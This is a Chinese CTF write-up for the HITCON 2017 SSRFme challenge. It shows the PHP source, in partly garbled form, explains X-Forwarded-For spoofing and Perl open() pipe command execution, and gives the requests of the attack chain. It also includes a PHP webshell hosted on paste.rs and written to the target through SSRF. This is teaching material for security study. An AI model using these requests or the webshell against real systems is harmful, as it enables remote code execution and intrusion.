[HITCON 2017]SSRFme

憧憬成为web高手2026-06-12 6:09

HITCON 2017 SSRFme

我做的时候题他问题 flag后是乱码

源码

```php

<?php

if (isset($_SERVER'HTTP_X_FORWARDED_FOR')) {

http_x_headers = explode(',', _SERVER'HTTP_X_FORWARDED_FOR');

_SERVER\['REMOTE_ADDR'\] = http_x_headers0;

}

echo $_SERVER"REMOTE_ADDR";

sandbox = "sandbox/" . md5("orange" . _SERVER"REMOTE_ADDR");

@mkdir($sandbox);

@chdir($sandbox);

data = shell_exec("GET " . escapeshellarg(_GET"url"));

info = pathinfo(_GET"filename");

dir = str_replace(".", "", basename(info"dirname"));

@mkdir($dir);

@chdir($dir);

@file_put_contents(basename(info\["basename"\]), data);

highlight_file(FILE);

?>

```

漏洞分析

1. IP 伪造 (X-Forwarded-For)

直接将用户可控的 HTTP 头赋值给 `REMOTE_ADDR`,可伪造 IP 控制沙箱路径。

2. Perl open() 管道符 RCE(核心)

`GET` 是 Perl libwww-perl 的命令。底层调用 Perl 的 `open()` 函数处理 `file:` 协议。

Perl 的 `open()` 特殊行为:**文件名以 `|` 结尾时,当作 shell 命令执行**。

`escapeshellarg` 将参数用单引号包裹,Shell 层面 `|` 不被解释。但 Perl `open()` 的 `|` 检测不经过 Shell,直接检查文件名字符串后缀,两者解析层面不同------绕过成功。

**前提条件**:以 `|` 结尾的文件必须先在文件系统中真实存在,`open()` 才会进入命令执行分支。

3. str_replace 目录穿越(有限)

`str_replace(".", "", ...)` 本想阻止 `..`,但 `..` → `""` 后 `mkdir("")` 和 `chdir("")` 失败,回退到当前目录,文件仍可写入沙箱根目录。

攻击链

Step 1:伪造 IP & 创建触发文件

```

X-Forwarded-For: 1.1.1.1

GET /?url=&filename=bash -c /readflag|

```

  • `shell_exec("GET '' ")` → `$data` 为空

  • `pathinfo("bash -c /readflag|")` → dirname=".", basename="bash -c /readflag|"

  • `str_replace(".","",".")` → ""

  • `mkdir("")` / `chdir("")` 失败,留在 sandbox 根目录

  • `file_put_contents("bash -c /readflag|", "")` → **创建空文件,文件名即为命令**

Step 2:触发 Perl open() RCE

```

GET /?url=file:bash -c /readflag|&filename=result

```

  • `GET 'file:bash -c /readflag|'` 内部:

  1. Perl 解析 `file:` 协议

  2. 调用 `open("bash -c /readflag|")`

  3. 文件名以 `|` 结尾 → **执行 `bash -c /readflag`**

  4. 命令输出作为文件"内容"返回

Step 3:读取 flag

```

GET /sandbox/<md5("orange1.1.1.1")>/result

```

关键知识点

| 要点 | 说明 |

|------|------|

| 漏洞类型 | Perl `open()` 管道符命令执行 |

| escapeshellarg 为何被绕过 | 发生在 Perl 层面(open 函数内部),非 Shell 层面 |

| 关键前提 | 以 `|` 结尾的文件必须先创建(内容可为空) |

| GET 命令 | libwww-perl 的 HTTP 客户端,支持 file/http/https/ftp 协议 |

替代方案:远程 Webshell(paste.rs

若 Perl open 管道不可用,可用 paste.rs 等粘贴服务托管 PHP 代码,通过 SSRF fetch 写入 `.php` 文件:

```bash

echo '<?php system($_GET"cmd");?>' | curl -F 'paste=<-' https://paste.rs

https://paste.rs/XXXX

curl 'http://target/?url=https://paste.rs/XXXX\&filename=cmd.php' -H 'X-Forwarded-For: 1.1.1.1'

→ 写入 sandbox/<hash>/cmd.php,可执行系统命令

```

相关推荐
妖精的羽翼1 小时前
AI + 前端、可视化 & 大屏
学习
xuhaoyu_cpp_java8 小时前
项目学习(三)分页查询
java·经验分享·笔记·学习
小宋加油啊10 小时前
机械臂抓取物体 PVN3D算法调研学习
学习·算法·3d
Xzh042310 小时前
AI Agent 学习路线(Java 后端方向)
java·人工智能·学习
做cv的小昊11 小时前
计算机图形学:【Games101】学习笔记08——光线追踪(辐射度量学、渲染方程与全局光照、蒙特卡洛积分与路径追踪)
图像处理·笔记·学习·计算机视觉·游戏引擎·图形渲染·概率论
星恒随风11 小时前
C++ 类和对象入门(五):初始化列表、explicit 和 static 成员详解
开发语言·c++·笔记·学习·状态模式
sensen_kiss13 小时前
CPT304 SoftwareEngineeringII 软件工程 2 Pt.8 软件测试 (Software Testing)(上)
学习·软件工程
力学与人工智能13 小时前
PPT分享 | 洛桑联邦理工学院魏震:深度几何学习在工业设计优化中的应用
学习·优化·工业设计·深度几何学习·洛桑联邦理工学院
sensen_kiss15 小时前
CPT304 SoftwareEngineeringII 软件工程 2 Pt.9 软件测试 (Software Testing)(下)
学习·软件工程
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06Codex 下载安装指南:Windows 和 macOS 官方版下载07AI科技热点日报 | 2026年6月1日082026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf09【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法10CC-Switch 下载、安装与使用配置指南【2026.5.29】